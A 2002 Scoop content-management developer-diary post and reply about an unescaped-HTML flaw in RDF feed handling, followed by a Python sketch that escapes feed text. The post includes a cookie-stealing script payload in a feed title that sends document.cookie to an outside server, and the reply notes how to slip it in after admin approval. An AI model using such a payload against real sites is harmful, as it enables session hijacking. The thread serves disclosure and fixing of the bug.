Scoop -- the swiss army chainsaw of content management
Security problem? Developer Diary
By hulver, Section Dev Notes
Posted on Wed Jan 30, 2002 at 10:37:13 AM PST
I'm not able to test this theory yet, so if someone could either prove/disprove this, I'd be grateful.

Read inside for possible security problem.

It's to do with the handling of rdf feeds. I don't think there is any checking on the result of the feeds, well I couldn't find any anyway.

The results coming back are quoted before being put into the database, so no SQL injection attacks are available, but it might be possible to insert some javascript.

NOTE: I don't have a working scoop set up at the moment, so all this might be junk.

Having an rdf feed with a link with a title of:

<title>Fake title<script>document.images[0].src="http://my.server.com/site.jpg?" + document.cookie</script>

Would it work? I don't know. Submitting an rdf feed like that would cause an Admin to look at it. Providing they did not examine the source, there would be no outward appearance that their cookie has just been stolen.

Is there anybody with a working scoop who can test this for me?

Security problem? | 3 comments (3 topical, 0 hidden)
Tested (none / 0) (#1)
by panner on Wed Jan 30, 2002 at 05:16:58 PM PST

Well, it apparently doesn't quote HTML, so it needs to do that. I tried slipping javascript in, but it didn't work (the opening and closing script tags ended up stuck together, so the actual code was displayed as text).

However, I did get it to load an image using just a normal <img> tag, so that's a bug and needs to be fixed.

Also, an admin isn't guaranteed to see that, since it could be placed in an item that is only added after approval. So the admin would approve it, then the malicious stuff would show up in the next re-fetch.

I suppose I'll try and fix this now, or tomorrow at the latest.



--
Keith Smiley
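
The missing HTML quoting discussed in this thread, as an added example that is not part of the original posts and is not Scoop's own code: a Python sketch that parses an RSS 1.0 (RDF) feed, treats every title and link as untrusted text, and escapes it when the HTML is produced. The sample feed, the `feed.example` host and all function names are constructed for illustration.

```python
import html
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

RSS = "{http://purl.org/rss/1.0/}"  # RSS 1.0 (RDF) element namespace

# Constructed sample feed: entity-encoded markup in a title is decoded by the
# XML parser back into literal "<script>" / "<img>" text.
SAMPLE_FEED = """<?xml version="1.0"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
         xmlns="http://purl.org/rss/1.0/">
  <item><title>Fake title&lt;script&gt;x()&lt;/script&gt;</title>
        <link>http://feed.example/story/1</link></item>
  <item><title>Pic &lt;img src="http://feed.example/a.jpg"&gt;</title>
        <link>javascript:x()</link></item>
  <item><title>Raw <b>child</b> markup</title>
        <link>https://feed.example/story/3</link></item>
</rdf:RDF>"""

def parse_items(feed_xml):
    """Return (title, link) pairs as plain text; nothing is trusted yet."""
    root = ET.fromstring(feed_xml)
    items = []
    for item in root.iter(RSS + "item"):
        title_el = item.find(RSS + "title")
        # itertext() flattens child elements, so raw tags in <title> are dropped.
        title = "".join(title_el.itertext()) if title_el is not None else ""
        link = (item.findtext(RSS + "link") or "").strip()
        items.append((title.strip(), link))
    return items

def safe_link(link):
    """Allow only absolute http(s) links; anything else becomes '#'."""
    parts = urlsplit(link)
    return link if parts.scheme in ("http", "https") and parts.netloc else "#"

def render_item(title, link):
    """Escape feed text at output time, for element and attribute context."""
    return '<a href="%s">%s</a>' % (
        html.escape(safe_link(link), quote=True),
        html.escape(title or "(untitled)", quote=True),
    )

def render_feed(feed_xml):
    return [render_item(title, link) for title, link in parse_items(feed_xml)]

if __name__ == "__main__":
    print("\n".join(render_feed(SAMPLE_FEED)))
```

Because the escaping happens on every render, an item that only appears in a later re-fetch, after the feed was approved, is neutralised the same way as one the admin saw.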


